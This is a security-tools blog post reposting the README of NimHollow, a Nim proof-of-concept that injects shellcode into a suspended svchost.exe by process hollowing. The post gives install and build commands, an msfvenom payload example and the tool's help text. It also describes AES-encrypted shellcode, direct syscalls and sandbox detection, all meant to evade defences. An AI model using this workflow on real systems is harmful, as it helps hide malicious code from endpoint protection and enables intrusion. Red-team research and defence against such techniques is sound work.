Kali Linux

NimHollow : Nim Implementation Of Process Hollowing Using Syscalls (PoC)

NimHollow is a Nim Implementation Of Process Hollowing Using Syscalls (PoC). Playing around with the Process Hollowing technique using Nim.

Features

  • Direct syscalls for triggering Windows Native API functions with NimlineWhispers or NimlineWhispers2.
  • Shellcode encryption/decryption with AES in CTR mode.
  • Simple sandbox detection methods from the OSEP course by @offensive-security.

DISCLAIMER. All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

Usage

Installation

~$ git clone –recurse-submodules https://github.com/snovvcrash/NimHollow && cd NimHollow
~$ git submodule update –init –recursive
~$ nimble install winim nimcrypto
~$ pip3 install -r requirements.txt
~$ sudo apt install upx -y

Example

~$ msfvenom -p windows/x64/messagebox TITLE=’MSF’ TEXT=’Hack the Planet!’ EXITFUNC=thread -f raw -o shellcode.bin
~$ python3 NimHollow.py shellcode.bin -i ‘C:\Windows\System32\svchost.exe’ -o injector –upx –rm [–whispers2]
~$ file injector.exe
injector.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows

Help

usage: NimHollow.py [-h] [-i IMAGE] [-o OUTPUT] [–whispers2] [–debug] [–upx] [–rm] shellcode_bin
positional arguments:
shellcode_bin path to the raw shellcode file
optional arguments:
-h, –help show this help message and exit
-i IMAGE, –image IMAGE
process image to hollow (default “C:\Windows\System32\svchost.exe”)
-o OUTPUT, –output OUTPUT
output filename
–whispers2 use NimlineWhispers2 to generate syscalls.nim
–debug do not strip debug messages from Nim binary
–upx compress Nim binary with upx
–rm remove Nim files after compiling the binary

Process Hollowing In Slides

1. Create the target process (e.g., svchost.exe) in a suspended state.

2. Query created process to extract its base address pointer from PEB (Process Environment Block).

3. Read 8 bytes of memory (for 64-bit architecture) pointed by the image base address pointer in order to get the actual value of the image base address.

4. Read 0x200 bytes of the loaded EXE image and parse PE structure to get the EntryPoint address.

 5. Write the shellcode to the EntryPoint address and resume thread execution.

Download

R K

Leave a Comment
Share
Published by
R K
Tags: Nim ImplementationNimHollow
3 years ago

Recent Posts

garak, LLM Vulnerability Scanner : The Comprehensive Tool For Assessing Language Model Security

garak checks if an LLM can be made to fail in a way we don't…

1 day ago

Vermilion : Mastering Linux Post-Exploitation For Red Team Success

Vermilion is a simple and lightweight CLI tool designed for rapid collection, and optional exfiltration…

1 day ago

AD-CS-Forest-Exploiter : Mastering Security Through PowerShell For AD CS Misconfiguration

ADCFFS is a PowerShell script that can be used to exploit the AD CS container…

1 day ago

Usage Of Tartufo – A Comprehensive Guide To Securing Your Git Repositories

Tartufo will, by default, scan the entire history of a git repository for any text…

1 day ago

Loco : A Rails-Inspired Framework For Rust Developers

Loco is strongly inspired by Rails. If you know Rails and Rust, you'll feel at…

2 days ago

Monolith : The Ultimate Tool For Storing Entire Web Pages As Single HTML Files

A data hoarder’s dream come true: bundle any web page into a single HTML file.…

2 days ago